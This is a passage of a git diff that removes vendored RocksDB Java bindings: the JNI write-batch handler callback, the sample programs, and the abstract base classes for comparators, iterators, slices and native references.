-    if (m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_endKey = sliceToJArray(beginKey);
-  if (j_endKey == nullptr) {
-    // exception thrown
-    if (m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(m_jWriteBatchHandler, m_jDeleteRangeMethodId,
-                        j_beginKey, j_endKey);
-  if (m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if (j_beginKey != nullptr) {
-      m_env->DeleteLocalRef(j_beginKey);
-    }
-    if (j_endKey != nullptr) {
-      m_env->DeleteLocalRef(j_endKey);
-    }
-    return;
-  }
-
-  if (j_beginKey != nullptr) {
-    m_env->DeleteLocalRef(j_beginKey);
-  }
-
-  if (j_endKey != nullptr) {
-    m_env->DeleteLocalRef(j_endKey);
-  }
-}
-
-void WriteBatchHandlerJniCallback::LogData(const Slice& blob) {
-  const jbyteArray j_blob = sliceToJArray(blob);
-  if(j_blob == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jLogDataMethodId,
-      j_blob);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_blob != nullptr) {
-      m_env->DeleteLocalRef(j_blob);
-    }
-    return;
-  }
-
-  if(j_blob != nullptr) {
-    m_env->DeleteLocalRef(j_blob);
-  }
-}
-
-bool WriteBatchHandlerJniCallback::Continue() {
-  jboolean jContinue = m_env->CallBooleanMethod(
-      m_jWriteBatchHandler,
-      m_jContinueMethodId);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-  }
-
-  return static_cast<bool>(jContinue == JNI_TRUE);
-}
-
-/*
- * Creates a Java Byte Array from the data in a Slice
- *
- * When calling this function
- * you must remember to call env->DeleteLocalRef
- * on the result after you have finished with it
- *
- * @param s A Slice to convery to a Java byte array
- *
- * @return A reference to a Java byte array, or a nullptr if an
- *     exception occurs
- */
-jbyteArray WriteBatchHandlerJniCallback::sliceToJArray(const Slice& s) {
-  jbyteArray ja = m_env->NewByteArray(static_cast<jsize>(s.size()));
-  if(ja == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  m_env->SetByteArrayRegion(
-      ja, 0, static_cast<jsize>(s.size()),
-      const_cast<jbyte*>(reinterpret_cast<const jbyte*>(s.data())));
-  if(m_env->ExceptionCheck()) {
-    if(ja != nullptr) {
-      m_env->DeleteLocalRef(ja);
-    }
-    // exception thrown: ArrayIndexOutOfBoundsException
-    return nullptr;
-  }
-
-  return ja;
-}
-
-WriteBatchHandlerJniCallback::~WriteBatchHandlerJniCallback() {
-  if(m_jWriteBatchHandler != nullptr) {
-    m_env->DeleteGlobalRef(m_jWriteBatchHandler);
-  }
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h b/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h
deleted file mode 100644
index 5d3dee3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::WriteBatch::Handler.
-
-#ifndef JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
-#define JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
-
-#include <jni.h>
-#include "rocksdb/write_batch.h"
-
-namespace rocksdb {
-/**
- * This class acts as a bridge between C++
- * and Java. The methods in this class will be
- * called back from the RocksDB storage engine (C++)
- * which calls the appropriate Java method.
- * This enables Write Batch Handlers to be implemented in Java.
- */
-class WriteBatchHandlerJniCallback : public WriteBatch::Handler {
- public:
-    WriteBatchHandlerJniCallback(
-      JNIEnv* env, jobject jWriteBackHandler);
-    ~WriteBatchHandlerJniCallback();
-    void Put(const Slice& key, const Slice& value);
-    void Merge(const Slice& key, const Slice& value);
-    void Delete(const Slice& key);
-    void DeleteRange(const Slice& beginKey, const Slice& endKey);
-    void LogData(const Slice& blob);
-    bool Continue();
-
- private:
-    JNIEnv* m_env;
-    jobject m_jWriteBatchHandler;
-    jbyteArray sliceToJArray(const Slice& s);
-    jmethodID m_jPutMethodId;
-    jmethodID m_jMergeMethodId;
-    jmethodID m_jDeleteMethodId;
-    jmethodID m_jDeleteRangeMethodId;
-    jmethodID m_jLogDataMethodId;
-    jmethodID m_jContinueMethodId;
-};
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java b/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java
deleted file mode 100644
index 650b1b2..0000000
--- a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import org.rocksdb.*;
-
-import java.util.ArrayList;
-import java.util.List;
-
-public class RocksDBColumnFamilySample {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public static void main(final String[] args) throws RocksDBException {
-    if (args.length < 1) {
-      System.out.println(
-          "usage: RocksDBColumnFamilySample db_path");
-      System.exit(-1);
-    }
-
-    final String db_path = args[0];
-
-    System.out.println("RocksDBColumnFamilySample");
-    try(final Options options = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(options, db_path)) {
-
-      assert(db != null);
-
-      // create column family
-      try(final ColumnFamilyHandle columnFamilyHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-          new ColumnFamilyOptions()))) {
-        assert (columnFamilyHandle != null);
-      }
-    }
-
-    // open DB with two column families
-    final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-        new ArrayList<>();
-    // have to open default column family
-    columnFamilyDescriptors.add(new ColumnFamilyDescriptor(
-        RocksDB.DEFAULT_COLUMN_FAMILY, new ColumnFamilyOptions()));
-    // open the new one, too
-    columnFamilyDescriptors.add(new ColumnFamilyDescriptor(
-        "new_cf".getBytes(), new ColumnFamilyOptions()));
-    final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-    try(final DBOptions options = new DBOptions();
-        final RocksDB db = RocksDB.open(options, db_path,
-            columnFamilyDescriptors, columnFamilyHandles)) {
-      assert(db != null);
-
-      try {
-        // put and get from non-default column family
-        db.put(columnFamilyHandles.get(0), new WriteOptions(),
-            "key".getBytes(), "value".getBytes());
-
-        // atomic write
-        try (final WriteBatch wb = new WriteBatch()) {
-          wb.put(columnFamilyHandles.get(0), "key2".getBytes(),
-              "value2".getBytes());
-          wb.put(columnFamilyHandles.get(1), "key3".getBytes(),
-              "value3".getBytes());
-          wb.remove(columnFamilyHandles.get(0), "key".getBytes());
-          db.write(new WriteOptions(), wb);
-        }
-
-        // drop column family
-        db.dropColumnFamily(columnFamilyHandles.get(1));
-      } finally {
-        for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-          handle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java b/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java
deleted file mode 100644
index f61995e..0000000
--- a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java
+++ /dev/null
@@ -1,303 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import java.lang.IllegalArgumentException;
-import java.util.Arrays;
-import java.util.List;
-import java.util.Map;
-import java.util.ArrayList;
-
-import org.rocksdb.*;
-import org.rocksdb.util.SizeUnit;
-
-public class RocksDBSample {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public static void main(final String[] args) {
-    if (args.length < 1) {
-      System.out.println("usage: RocksDBSample db_path");
-      System.exit(-1);
-    }
-
-    final String db_path = args[0];
-    final String db_path_not_found = db_path + "_not_found";
-
-    System.out.println("RocksDBSample");
-    try (final Options options = new Options();
-         final Filter bloomFilter = new BloomFilter(10);
-         final ReadOptions readOptions = new ReadOptions()
-             .setFillCache(false);
-         final Statistics stats = new Statistics();
-         final RateLimiter rateLimiter = new RateLimiter(10000000,10000, 10)) {
-
-      try (final RocksDB db = RocksDB.open(options, db_path_not_found)) {
-        assert (false);
-      } catch (final RocksDBException e) {
-        System.out.format("Caught the expected exception -- %s\n", e);
-      }
-
-      try {
-        options.setCreateIfMissing(true)
-            .setStatistics(stats)
-            .setWriteBufferSize(8 * SizeUnit.KB)
-            .setMaxWriteBufferNumber(3)
-            .setMaxBackgroundCompactions(10)
-            .setCompressionType(CompressionType.SNAPPY_COMPRESSION)
-            .setCompactionStyle(CompactionStyle.UNIVERSAL);
-      } catch (final IllegalArgumentException e) {
-        assert (false);
-      }
-
-      assert (options.createIfMissing() == true);
-      assert (options.writeBufferSize() == 8 * SizeUnit.KB);
-      assert (options.maxWriteBufferNumber() == 3);
-      assert (options.maxBackgroundCompactions() == 10);
-      assert (options.compressionType() == CompressionType.SNAPPY_COMPRESSION);
-      assert (options.compactionStyle() == CompactionStyle.UNIVERSAL);
-
-      assert (options.memTableFactoryName().equals("SkipListFactory"));
-      options.setMemTableConfig(
-          new HashSkipListMemTableConfig()
-              .setHeight(4)
-              .setBranchingFactor(4)
-              .setBucketCount(2000000));
-      assert (options.memTableFactoryName().equals("HashSkipListRepFactory"));
-
-      options.setMemTableConfig(
-          new HashLinkedListMemTableConfig()
-              .setBucketCount(100000));
-      assert (options.memTableFactoryName().equals("HashLinkedListRepFactory"));
-
-      options.setMemTableConfig(
-          new VectorMemTableConfig().setReservedSize(10000));
-      assert (options.memTableFactoryName().equals("VectorRepFactory"));
-
-      options.setMemTableConfig(new SkipListMemTableConfig());
-      assert (options.memTableFactoryName().equals("SkipListFactory"));
-
-      options.setTableFormatConfig(new PlainTableConfig());
-      // Plain-Table requires mmap read
-      options.setAllowMmapReads(true);
-      assert (options.tableFactoryName().equals("PlainTable"));
-
-      options.setRateLimiter(rateLimiter);
-
-      final BlockBasedTableConfig table_options = new BlockBasedTableConfig();
-      table_options.setBlockCacheSize(64 * SizeUnit.KB)
-          .setFilter(bloomFilter)
-          .setCacheNumShardBits(6)
-          .setBlockSizeDeviation(5)
-          .setBlockRestartInterval(10)
-          .setCacheIndexAndFilterBlocks(true)
-          .setHashIndexAllowCollision(false)
-          .setBlockCacheCompressedSize(64 * SizeUnit.KB)
-          .setBlockCacheCompressedNumShardBits(10);
-
-      assert (table_options.blockCacheSize() == 64 * SizeUnit.KB);
-      assert (table_options.cacheNumShardBits() == 6);
-      assert (table_options.blockSizeDeviation() == 5);
-      assert (table_options.blockRestartInterval() == 10);
-      assert (table_options.cacheIndexAndFilterBlocks() == true);
-      assert (table_options.hashIndexAllowCollision() == false);
-      assert (table_options.blockCacheCompressedSize() == 64 * SizeUnit.KB);
-      assert (table_options.blockCacheCompressedNumShardBits() == 10);
-
-      options.setTableFormatConfig(table_options);
-      assert (options.tableFactoryName().equals("BlockBasedTable"));
-
-      try (final RocksDB db = RocksDB.open(options, db_path)) {
-        db.put("hello".getBytes(), "world".getBytes());
-
-        final byte[] value = db.get("hello".getBytes());
-        assert ("world".equals(new String(value)));
-
-        final String str = db.getProperty("rocksdb.stats");
-        assert (str != null && !str.equals(""));
-      } catch (final RocksDBException e) {
-        System.out.format("[ERROR] caught the unexpected exception -- %s\n", e);
-        assert (false);
-      }
-
-      try (final RocksDB db = RocksDB.open(options, db_path)) {
-        db.put("hello".getBytes(), "world".getBytes());
-        byte[] value = db.get("hello".getBytes());
-        System.out.format("Get('hello') = %s\n",
-            new String(value));
-
-        for (int i = 1; i <= 9; ++i) {
-          for (int j = 1; j <= 9; ++j) {
-            db.put(String.format("%dx%d", i, j).getBytes(),
-                String.format("%d", i * j).getBytes());
-          }
-        }
-
-        for (int i = 1; i <= 9; ++i) {
-          for (int j = 1; j <= 9; ++j) {
-            System.out.format("%s ", new String(db.get(
-                String.format("%dx%d", i, j).getBytes())));
-          }
-          System.out.println("");
-        }
-
-        // write batch test
-        try (final WriteOptions writeOpt = new WriteOptions()) {
-          for (int i = 10; i <= 19; ++i) {
-            try (final WriteBatch batch = new WriteBatch()) {
-              for (int j = 10; j <= 19; ++j) {
-                batch.put(String.format("%dx%d", i, j).getBytes(),
-                    String.format("%d", i * j).getBytes());
-              }
-              db.write(writeOpt, batch);
-            }
-          }
-        }
-        for (int i = 10; i <= 19; ++i) {
-          for (int j = 10; j <= 19; ++j) {
-            assert (new String(
-                db.get(String.format("%dx%d", i, j).getBytes())).equals(
-                String.format("%d", i * j)));
-            System.out.format("%s ", new String(db.get(
-                String.format("%dx%d", i, j).getBytes())));
-          }
-          System.out.println("");
-        }
-
-        value = db.get("1x1".getBytes());
-        assert (value != null);
-        value = db.get("world".getBytes());
-        assert (value == null);
-        value = db.get(readOptions, "world".getBytes());
-        assert (value == null);
-
-        final byte[] testKey = "asdf".getBytes();
-        final byte[] testValue =
-            "asdfghjkl;'?><MNBVCXZQWERTYUIOP{+_)(*&^%$#@".getBytes();
-        db.put(testKey, testValue);
-        byte[] testResult = db.get(testKey);
-        assert (testResult != null);
-        assert (Arrays.equals(testValue, testResult));
-        assert (new String(testValue).equals(new String(testResult)));
-        testResult = db.get(readOptions, testKey);
-        assert (testResult != null);
-        assert (Arrays.equals(testValue, testResult));
-        assert (new String(testValue).equals(new String(testResult)));
-
-        final byte[] insufficientArray = new byte[10];
-        final byte[] enoughArray = new byte[50];
-        int len;
-        len = db.get(testKey, insufficientArray);
-        assert (len > insufficientArray.length);
-        len = db.get("asdfjkl;".getBytes(), enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-        len = db.get(testKey, enoughArray);
-        assert (len == testValue.length);
-
-        len = db.get(readOptions, testKey, insufficientArray);
-        assert (len > insufficientArray.length);
-        len = db.get(readOptions, "asdfjkl;".getBytes(), enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-        len = db.get(readOptions, testKey, enoughArray);
-        assert (len == testValue.length);
-
-        db.remove(testKey);
-        len = db.get(testKey, enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-
-        // repeat the test with WriteOptions
-        try (final WriteOptions writeOpts = new WriteOptions()) {
-          writeOpts.setSync(true);
-          writeOpts.setDisableWAL(true);
-          db.put(writeOpts, testKey, testValue);
-          len = db.get(testKey, enoughArray);
-          assert (len == testValue.length);
-          assert (new String(testValue).equals(
-              new String(enoughArray, 0, len)));
-        }
-
-        try {
-          for (final TickerType statsType : TickerType.values()) {
-            if (statsType != TickerType.TICKER_ENUM_MAX) {
-              stats.getTickerCount(statsType);
-            }
-          }
-          System.out.println("getTickerCount() passed.");
-        } catch (final Exception e) {
-          System.out.println("Failed in call to getTickerCount()");
-          assert (false); //Should never reach here.
-        }
-
-        try {
-          for (final HistogramType histogramType : HistogramType.values()) {
-            if (histogramType != HistogramType.HISTOGRAM_ENUM_MAX) {
-              HistogramData data = stats.getHistogramData(histogramType);
-            }
-          }
-          System.out.println("getHistogramData() passed.");
-        } catch (final Exception e) {
-          System.out.println("Failed in call to getHistogramData()");
-          assert (false); //Should never reach here.
-        }
-
-        try (final RocksIterator iterator = db.newIterator()) {
-
-          boolean seekToFirstPassed = false;
-          for (iterator.seekToFirst(); iterator.isValid(); iterator.next()) {
-            iterator.status();
-            assert (iterator.key() != null);
-            assert (iterator.value() != null);
-            seekToFirstPassed = true;
-          }
-          if (seekToFirstPassed) {
-            System.out.println("iterator seekToFirst tests passed.");
-          }
-
-          boolean seekToLastPassed = false;
-          for (iterator.seekToLast(); iterator.isValid(); iterator.prev()) {
-            iterator.status();
-            assert (iterator.key() != null);
-            assert (iterator.value() != null);
-            seekToLastPassed = true;
-          }
-
-          if (seekToLastPassed) {
-            System.out.println("iterator seekToLastPassed tests passed.");
-          }
-
-          iterator.seekToFirst();
-          iterator.seek(iterator.key());
-          assert (iterator.key() != null);
-          assert (iterator.value() != null);
-
-          System.out.println("iterator seek test passed.");
-
-        }
-        System.out.println("iterator tests passed.");
-
-        final List<byte[]> keys = new ArrayList<>();
-        try (final RocksIterator iterator = db.newIterator()) {
-          for (iterator.seekToLast(); iterator.isValid(); iterator.prev()) {
-            keys.add(iterator.key());
-          }
-        }
-
-        Map<byte[], byte[]> values = db.multiGet(keys);
-        assert (values.size() == keys.size());
-        for (final byte[] value1 : values.values()) {
-          assert (value1 != null);
-        }
-
-        values = db.multiGet(new ReadOptions(), keys);
-        assert (values.size() == keys.size());
-        for (final byte[] value1 : values.values()) {
-          assert (value1 != null);
-        }
-      } catch (final RocksDBException e) {
-        System.err.println(e);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java
deleted file mode 100644
index 976401f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java
+++ /dev/null
@@ -1,30 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * A CompactionFilter allows an application to modify/delete a key-value at
- * the time of compaction.
- *
- * At present we just permit an overriding Java class to wrap a C++
- * implementation
- */
-public abstract class AbstractCompactionFilter<T extends AbstractSlice<?>>
-    extends RocksObject {
-
-  protected AbstractCompactionFilter(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Deletes underlying C++ compaction pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the compaction filter are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java
deleted file mode 100644
index 0fc4a19..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java
+++ /dev/null
@@ -1,106 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Comparators are used by RocksDB to determine
- * the ordering of keys.
- *
- * This class is package private, implementers
- * should extend either of the public abstract classes:
- *   @see org.rocksdb.Comparator
- *   @see org.rocksdb.DirectComparator
- */
-public abstract class AbstractComparator<T extends AbstractSlice<?>>
-    extends AbstractImmutableNativeReference {
-
-  protected AbstractComparator() {
-    super(true);
-  }
-
-  /**
-   * The name of the comparator.  Used to check for comparator
-   * mismatches (i.e., a DB created with one comparator is
-   * accessed using a different comparator).
-   *
-   * A new name should be used whenever
-   * the comparator implementation changes in a way that will cause
-   * the relative ordering of any two keys to change.
-   *
-   * Names starting with "rocksdb." are reserved and should not be used.
-   *
-   * @return The name of this comparator implementation
-   */
-  public abstract String name();
-
-  /**
-   * Three-way key comparison
-   *
-   *  @param a Slice access to first key
-   *  @param b Slice access to second key
-   *
-   *  @return Should return either:
-   *    1) &lt; 0 if "a" &lt; "b"
-   *    2) == 0 if "a" == "b"
-   *    3) &gt; 0 if "a" &gt; "b"
-   */
-  public abstract int compare(final T a, final T b);
-
-  /**
-   * <p>Used to reduce the space requirements
-   * for internal data structures like index blocks.</p>
-   *
-   * <p>If start &lt; limit, you may return a new start which is a
-   * shorter string in [start, limit).</p>
-   *
-   * <p>Simple comparator implementations may return null if they
-   * wish to use start unchanged. i.e., an implementation of
-   * this method that does nothing is correct.</p>
-   *
-   * @param start String
-   * @param limit of type T
-   *
-   * @return a shorter start, or null
-   */
-  public String findShortestSeparator(final String start, final T limit) {
-      return null;
-  }
-
-  /**
-   * <p>Used to reduce the space requirements
-   * for internal data structures like index blocks.</p>
-   *
-   * <p>You may return a new short key (key1) where
-   * key1 &ge; key.</p>
-   *
-   * <p>Simple comparator implementations may return null if they
-   * wish to leave the key unchanged. i.e., an implementation of
-   * this method that does nothing is correct.</p>
-   *
-   * @param key String
-   *
-   * @return a shorter key, or null
-   */
-  public String findShortSuccessor(final String key) {
-      return null;
-  }
-
-  /**
-   * Deletes underlying C++ comparator pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the comparator are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(getNativeHandle());
-  }
-
-  protected abstract long getNativeHandle();
-
-  private native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java
deleted file mode 100644
index b1dc1ef..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.concurrent.atomic.AtomicBoolean;
-
-/**
- * Offers functionality for implementations of
- * {@link AbstractNativeReference} which have an immutable reference to the
- * underlying native C++ object
- */
-public abstract class AbstractImmutableNativeReference
-    extends AbstractNativeReference {
-
-  /**
-   * A flag indicating whether the current {@code AbstractNativeReference} is
-   * responsible to free the underlying C++ object
-   */
-  private final AtomicBoolean owningHandle_;
-
-  protected AbstractImmutableNativeReference(final boolean owningHandle) {
-    this.owningHandle_ = new AtomicBoolean(owningHandle);
-  }
-
-  @Override
-  public boolean isOwningHandle() {
-    return owningHandle_.get();
-  }
-
-  /**
-   * Releases this {@code AbstractNativeReference} from  the responsibility of
-   * freeing the underlying native C++ object
-   * <p>
-   * This will prevent the object from attempting to delete the underlying
-   * native object in its finalizer. This must be used when another object
-   * takes over ownership of the native object or both will attempt to delete
-   * the underlying object when garbage collected.
-   * <p>
-   * When {@code disOwnNativeHandle()} is called, {@code dispose()} will
-   * subsequently take no action. As a result, incorrect use of this function
-   * may cause a memory leak.
-   * </p>
-   *
-   * @see #dispose()
-   */
-  protected final void disOwnNativeHandle() {
-    owningHandle_.set(false);
-  }
-
-  @Override
-  public void close() {
-    if (owningHandle_.compareAndSet(true, false)) {
-      disposeInternal();
-    }
-  }
-
-  /**
-   * The helper function of {@link AbstractImmutableNativeReference#dispose()}
-   * which all subclasses of {@code AbstractImmutableNativeReference} must
-   * implement to release their underlying native C++ objects.
-   */
-  protected abstract void disposeInternal();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java
deleted file mode 100644
index ffb0776..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java
+++ /dev/null
@@ -1,76 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * AbstractNativeReference is the base-class of all RocksDB classes that have
- * a pointer to a native C++ {@code rocksdb} object.
- * <p>
- * AbstractNativeReference has the {@link AbstractNativeReference#dispose()}
- * method, which frees its associated C++ object.</p>
- * <p>
- * This function should be called manually, however, if required it will be
- * called automatically during the regular Java GC process via
- * {@link AbstractNativeReference#finalize()}.</p>
- * <p>
- * Note - Java can only see the long member variable (which is the C++ pointer
- * value to the native object), as such it does not know the real size of the
- * object and therefore may assign a low GC priority for it; So it is strongly
- * suggested that you manually dispose of objects when you are finished with
- * them.</p>
- */
-public abstract class AbstractNativeReference implements AutoCloseable {
-
-  /**
-   * Returns true if we are responsible for freeing the underlying C++ object
-   *
-   * @return true if we are responsible to free the C++ object
-   * @see #dispose()
-   */
-  protected abstract boolean isOwningHandle();
-
-  /**
-   * Frees the underlying C++ object
-   * <p>
-   * It is strong recommended that the developer calls this after they
-   * have finished using the object.</p>
-   * <p>
-   * Note, that once an instance of {@link AbstractNativeReference} has been
-   * disposed, calling any of its functions will lead to undefined
-   * behavior.</p>
-   */
-  @Override
-  public abstract void close();
-
-  /**
-   * @deprecated Instead use {@link AbstractNativeReference#close()}
-   */
-  @Deprecated
-  public final void dispose() {
-    close();
-  }
-
-  /**
-   * Simply calls {@link AbstractNativeReference#dispose()} to free
-   * any underlying C++ object reference which has not yet been manually
-   * released.
-   *
-   * @deprecated You should not rely on GC of Rocks objects, and instead should
-   * either call {@link AbstractNativeReference#close()} manually or make
-   * use of some sort of ARM (Automatic Resource Management) such as
-   * Java 7's <a href="https://docs.oracle.com/javase/tutorial/essential/exceptions/tryResourceClose.html">try-with-resources</a>
-   * statement
-   */
-  @Override
-  @Deprecated
-  protected void finalize() throws Throwable {
-    if(isOwningHandle()) {
-      //TODO(AR) log a warning message... developer should have called close()
-    }
-    dispose();
-    super.finalize();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java
deleted file mode 100644
index 52bd00f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java
+++ /dev/null
@@ -1,101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class implementation for Rocks Iterators
- * in the Java API
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @param <P> The type of the Parent Object from which the Rocks Iterator was
- *          created. This is used by disposeInternal to avoid double-free
- *          issues with the underlying C++ object.
- * @see org.rocksdb.RocksObject
- */
-public abstract class AbstractRocksIterator<P extends RocksObject>
-    extends RocksObject implements RocksIteratorInterface {
-  final P parent_;
-
-  protected AbstractRocksIterator(final P parent,
-      final long nativeHandle) {
-    super(nativeHandle);
-    // parent must point to a valid RocksDB instance.
-    assert (parent != null);
-    // RocksIterator must hold a reference to the related parent instance
-    // to guarantee that while a GC cycle starts RocksIterator instances
-    // are freed prior to parent instances.
-    parent_ = parent;
-  }
-
-  @Override
-  public boolean isValid() {
-    assert (isOwningHandle());
-    return isValid0(nativeHandle_);
-  }
-
-  @Override
-  public void seekToFirst() {
-    assert (isOwningHandle());
-    seekToFirst0(nativeHandle_);
-  }
-
-  @Override
-  public void seekToLast() {
-    assert (isOwningHandle());
-    seekToLast0(nativeHandle_);
-  }
-
-  @Override
-  public void seek(byte[] target) {
-    assert (isOwningHandle());
-    seek0(nativeHandle_, target, target.length);
-  }
-
-  @Override
-  public void next() {
-    assert (isOwningHandle());
-    next0(nativeHandle_);
-  }
-
-  @Override
-  public void prev() {
-    assert (isOwningHandle());
-    prev0(nativeHandle_);
-  }
-
-  @Override
-  public void status() throws RocksDBException {
-    assert (isOwningHandle());
-    status0(nativeHandle_);
-  }
-
-  /**
-   * <p>Deletes underlying C++ iterator pointer.</p>
-   *
-   * <p>Note: the underlying handle can only be safely deleted if the parent
-   * instance related to a certain RocksIterator is still valid and initialized.
-   * Therefore {@code disposeInternal()} checks if the parent is initialized
-   * before freeing the native handle.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-      if (parent_.isOwningHandle()) {
-        disposeInternal(nativeHandle_);
-      }
-  }
-
-  abstract boolean isValid0(long handle);
-  abstract void seekToFirst0(long handle);
-  abstract void seekToLast0(long handle);
-  abstract void next0(long handle);
-  abstract void prev0(long handle);
-  abstract void seek0(long handle, byte[] target, int targetLen);
-  abstract void status0(long handle) throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java
deleted file mode 100644
index 5a22e29..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java
+++ /dev/null
@@ -1,191 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Slices are used by RocksDB to provide
- * efficient access to keys and values.
- *
- * This class is package private, implementers
- * should extend either of the public abstract classes:
- *   @see org.rocksdb.Slice
- *   @see org.rocksdb.DirectSlice
- *
